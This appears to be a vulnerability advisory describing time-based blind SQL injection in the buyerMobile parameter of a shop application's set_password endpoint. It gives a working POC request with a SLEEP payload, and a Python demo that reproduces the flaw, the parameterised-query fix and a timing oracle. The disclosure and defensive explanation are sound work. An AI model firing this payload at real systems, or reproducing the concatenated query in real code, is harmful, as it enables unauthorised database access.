Description
Vulnerability Details
URL: http://127.0.0.1/index.php/home/set_password; the buyerMobile POST parameter is the injection point.

The vulnerable code is the set_password function in application/controllers/home.php. When the mobile phone number is looked up in the database, the buyerMobile value is not filtered or bound as a parameter; it is concatenated directly into the SQL string, so any SQL appended to the number becomes part of the query.

Verifying the endpoint with sqlmap confirms that time-based blind SQL injection exists.

POC:
POST /index.php/home/set_password HTTP/1.1
Host: 127.0.0.1
Content-Length: 150
sec-ch-ua-platform: "Windows"
x-requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept: */*
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
content-type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/index.php/home/set_password
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ACG-SHOP=7trdppv8jsk0pvvmu7slmutgrm; PHPSESSID=8rlf7un6rqqhfjjv0vhjqifd25
Connection: close
buyerId=1&userType=2&buyerMobile=17805931781 AND (SELECT 3501 FROM (SELECT(SLEEP(5)))YLBw)&newPassword=L12345678&buyerName=%E9%9F%A9%E4%BF%8A%E6%9D%B0
The response is delayed by 5 seconds. To rule out ordinary latency, send the same request with a plain buyerMobile value and compare the response times; only the payload request should carry the delay.
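To make the mechanism concrete, the following is an added example written for this write-up; it is not code from the affected project (which is PHP) but a Python model using an in-memory SQLite table as a stand-in. The table, the row, the SLEEP() function registered to imitate MySQL's, and the shortened 1-second delay are all constructed assumptions. It shows the same flaw the report describes (the parameter spliced into the SQL text), the bound-parameter fix, and a timing oracle of the kind sqlmap uses, which compares the payload request against a benign baseline rather than against a fixed threshold.

```python
import sqlite3
import time

# Constructed stand-in table and row; not the project's real schema.
SCHEMA = ("CREATE TABLE buyer (buyer_id INTEGER PRIMARY KEY, "
          "buyer_mobile TEXT, buyer_name TEXT, password TEXT)")
ROWS = [(1, "17805931781", "Han Junjie", "old-hash")]

# The report's payload with the delay shortened from 5 s to 1 s so the demo runs quickly.
DELAY = 1.0
PAYLOAD = "17805931781 AND (SELECT 3501 FROM (SELECT(SLEEP(%d)))YLBw)" % int(DELAY)


def _sleep(seconds):
    """Hypothetical stand-in for MySQL's SLEEP(): blocks, then returns 0 like MySQL."""
    time.sleep(seconds)
    return 0


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, _sleep)
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO buyer VALUES (?, ?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, buyer_mobile):
    # Same flaw as the report describes: the parameter is spliced straight into the SQL
    # text, so "AND (SELECT ... SLEEP ...)" becomes part of the WHERE clause.
    sql = "SELECT buyer_id FROM buyer WHERE buyer_mobile = " + buyer_mobile
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, buyer_mobile):
    # Bound parameter: the value is handed to the engine separately and is only ever
    # compared as data, so the payload matches no row and nothing inside it executes.
    sql = "SELECT buyer_id FROM buyer WHERE buyer_mobile = ?"
    return conn.execute(sql, (buyer_mobile,)).fetchall()


def timed(lookup, conn, value):
    """Run one lookup and return (rows, elapsed_seconds)."""
    start = time.monotonic()
    rows = lookup(conn, value)
    return rows, time.monotonic() - start


def looks_time_injectable(lookup, conn, delay=DELAY):
    """Time-based oracle in the spirit of sqlmap: the payload request must take
    noticeably longer than a benign request to the same lookup, so normal latency
    is subtracted out instead of being mistaken for an injected delay."""
    _, baseline = timed(lookup, conn, "17805931781")
    _, with_payload = timed(lookup, conn, PAYLOAD)
    return (with_payload - baseline) >= 0.8 * delay


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", looks_time_injectable(lookup_vulnerable, db))  # True
    print("fixed:     ", looks_time_injectable(lookup_fixed, db))       # False
```

In the vulnerable path the benign number and the payload both return the buyer row, but only the payload incurs the sleep; in the fixed path the payload is compared as a literal string, matches nothing, and returns immediately. The same change (query bindings or prepared statements instead of string concatenation) is the fix for set_password.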